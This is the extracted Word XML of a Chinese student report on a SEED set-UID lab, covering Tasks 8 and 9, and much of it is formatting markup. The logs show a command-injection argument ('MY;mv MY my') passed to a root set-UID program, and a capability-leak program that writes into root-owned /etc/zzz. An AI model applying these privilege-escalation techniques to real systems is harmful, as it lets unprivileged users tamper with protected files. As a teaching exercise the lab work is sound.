        <w:t>Task 8 : Invoking External Programs Using system() versus execve()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 w:val="0"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>实验步骤：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8$ sudo gcc -o a.out a.c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 xml:space="preserve">[09/02/20]seed@VM:~/.../task 8$ sudo chown root a.out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8$ sudo chmod 4755 a.out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8$ chmod u=rwx,g=---,o=--- MY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8$ ls -l MY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-rwx------ 1 seed seed 0 Sep  2 12:07 MY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8$ a.out "MY;mv MY my"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8$ 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c  a.out  my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新建一个名为MY的文件，并设置其权限为仅root用户可读、写、执行。</w:t>
      </w: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执行demo8，发现原本只有root用户才具有读、写、执行的MY文件，已经更名为my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注释掉system(command)语句，并取消execve（）语句的注释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8$ gcc -o a.out a.c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a.c: In function ‘main’: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a.c:17:1: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration]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 xml:space="preserve"> execve(v[0], v, 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 xml:space="preserve"> ^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8$ sudo chown root a.out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8$ sudo chmod 4755 a.out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8$ chmod u=rwx,g=---,o=--- MY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8$ ls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a.c  a.out  MY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因为execve()函数会把file; mv file file_new 看成是一个文件名，系统会提示不存在这个文件，system()则不会。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方正清仿宋 简 Bold" w:eastAsia="方正清仿宋 简 Bold" w:cs="方正清仿宋 简 Bold" w:asciiTheme="majorAscii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 w:val="0"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Task 9: Capability Leaking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/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>实验步骤：</w:t>
      </w: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[09/02/20]seed@VM:~/.../task 9$ sudo chmod u=rwx,g=r-x,o=r-x /etc/zzz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chmod: cannot access '/etc/zzz': No such file or directory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9$ sudo touch /etc/zzz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9$ sudo chmod u=rwx,g=r--,o=r-- /etc/zzz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9$ sudo ls -l /etc/zzz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-rwxr--r-- 1 root root 0 Sep  2 12:20 /etc/zzz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9$ sudo gcc -o a.out a.c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a.c: In function ‘main’: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a.c:15:1: warning: implicit declaration of function ‘sleep’ [-Wimplicit-function-declaration]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 xml:space="preserve"> sleep(1);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 xml:space="preserve"> ^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a.c:18:1: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]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 xml:space="preserve"> setuid(getuid()); /* getuid() returns the real uid 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 xml:space="preserve"> ^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a.c:18:8: warning: implicit declaration of function ‘getuid’ [-Wimplicit-function-declaration]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 xml:space="preserve"> setuid(getuid()); /* getuid() returns the real uid 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 xml:space="preserve">        ^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a.c:19:5: warning: implicit declaration of function ‘fork’ [-Wimplicit-function-declaration]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 xml:space="preserve"> if (fork()) { /* In the parent process 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 xml:space="preserve">     ^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a.c:20:1: warning: implicit declaration of function ‘close’ [-Wimplicit-function-declaration]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 xml:space="preserve"> close (fd);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 xml:space="preserve"> ^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a.c:25:1: warning: implicit declaration of function ‘write’ [-Wimplicit-function-declaration]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 xml:space="preserve"> write (fd, "Malicious Data\n", 15);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 xml:space="preserve"> ^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9$ sudo chown root a.out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9$ sudo chmod 4755 a.out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执行a.out，查看内容，发现被写入信息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9$ a.out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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>[09/02/20]seed@VM:~/.../task 9$ cat /etc/zzz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Malicious Data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  <w:t>因为在取消权限前并没有关闭文件，导致seed用户任然可以进行root用户才可以执行的写入操作。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方正清仿宋 简 Bold" w:eastAsia="方正清仿宋 简 Bold" w:cs="方正清仿宋 简 Bold" w:asciiTheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="1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  <w:embedRegular r:id="rId1" w:fontKey="{2B23236D-D434-48BE-ABBF-163914DFFAA2}"/>
  </w:font>
  <w:font w:name="方正清仿宋 简 Bold">
    <w:panose1 w:val="02000800000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="A00002BF" w:usb1="184F6CFA" w:usb2="00000012" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
    <w:embedRegular r:id="rId2" w:fontKey="{FA515ECB-FCA8-4D22-A307-9EA7F2A0B507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20D4EC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D720D4E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76056DB3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="76056DB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87E18"/>
    <w:rsid w:val="2BF10772"/>
    <w:rsid w:val="48435ED3"/>
    <w:rsid w:val="48711EC7"/>
    <w:rsid w:val="71AF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2020-09-02T02:57:00Z</dcterms:created>
  <dc:creator>钟杰</dc:creator>
  <cp:lastModifiedBy>Miss . Right</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-03T08:50:54Z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